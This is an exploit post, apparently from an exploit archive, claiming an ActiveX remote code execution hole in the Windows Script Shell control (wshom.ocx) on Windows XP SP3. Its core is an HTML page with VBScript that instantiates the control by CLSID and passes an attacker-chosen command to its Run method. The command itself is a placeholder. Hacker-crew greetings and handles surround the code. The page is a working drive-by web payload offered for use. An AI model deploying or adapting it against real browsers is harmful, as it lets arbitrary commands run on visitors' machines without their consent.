##################################{In The Name Of Allah The Mercifull}######################  

# Title : Windows Script.Shell.1 (V 1.0) (wshom.ocx) 0day suffer from ActiveX Remote Code Execution?  

# Tested : Windows xp (sp3)                                               ##
   
## Author : R3d-D3v!L <X[at]hotmail.co.jp>                     

# Credits to : XP10_HACKER ((XP10.ME-xp10.com))                         ##  

## Greetz : DOLLY-MERNA & DR_DAShER & JUPA & hetlar jaddah& Abo-ShA@D ##  
                                                                     ##
## all member at XP10.com                                           ##  
                                                             
########################################################           ##

infected bath : WINDOWS\system32\wshom.ocx


infected Function : 


Function Exec (
 	ByVal Command  As String 
)  As IWshExec

&

Function Run (
 	ByVal Command  As String , 
 	[ ByRef WindowStyle  As Variant ] , 
 	[ ByRef WaitOnReturn  As Variant ] 
)  As Long


in (Exec & Run) in  IWshShell3



EXPLO!T: 

<html>  

</font></b></p>  

<p>  

<object classid='clsid:F935DC20-1CF0-11D0-ADB9-00C04FD58A0B' id='target'  

></object>  

<script language='vbscript'>  

   

arg1=" TYPE YOUR EV!L Code Execution? "  

   

target.run arg1  

   

</script></p> 


     

[~]-----------------------------{((MAGOUSH-87))}------------------------------------------------#   

#   

[~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] #   

#   

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #   

#   

[~] spechial thanks : ((HITLER JEDDAH & abo-shahd & DR.DAShER & abo-hlil)) #   

#   

[?]spechial SupP0RT : MY M!ND # &#169; Offensive Security #   

#   

[~]spechial FR!ND: JUPA #  
   

#   

[~] !'M 4R48!4N 3XPL0!73R. #   

#   

[~]{[(D!R 4ll 0R D!E)]}; #   

#   

[~]---------------------------------------------------------------------------------------------